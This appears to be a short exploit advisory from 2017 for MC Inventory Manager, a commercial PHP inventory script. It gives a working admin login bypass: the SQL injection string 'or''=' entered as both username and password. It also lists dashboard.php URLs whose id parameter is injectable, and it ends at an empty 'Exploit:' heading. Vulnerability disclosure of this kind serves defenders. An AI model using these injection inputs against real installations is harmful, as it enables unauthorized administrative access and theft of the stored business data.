# # # # # # Vulnerability: Admin Login Bypass & SQLi # Date: 15.01.2017 # Vendor Homepage: http://microcode.ws/ # Script Name: MC Inventory Manager # Script Buy Now: http://microcode.ws/product/mc-inventory-manager-php-script/3885 # Author: Adeghsan Aencan # Author Web: http://ihsan.net # Mail : ihsan[beygir]ihsan[nokta]net # # # # # # Admin Login Bypass # http://localhost/[PATH]/admin/ and set Username:'or''=' and Password to 'or''=' and hit enter. # # # # # # http://localhost/[PATH]/dashboard.php?p=view_sell&id=[SQL] # http://localhost/[PATH]//dashboard.php?p=edit_item&id=[SQL] # E.t.c.... # Other features have the same security vulnerability. # Exploit:
# # # # # # # # # #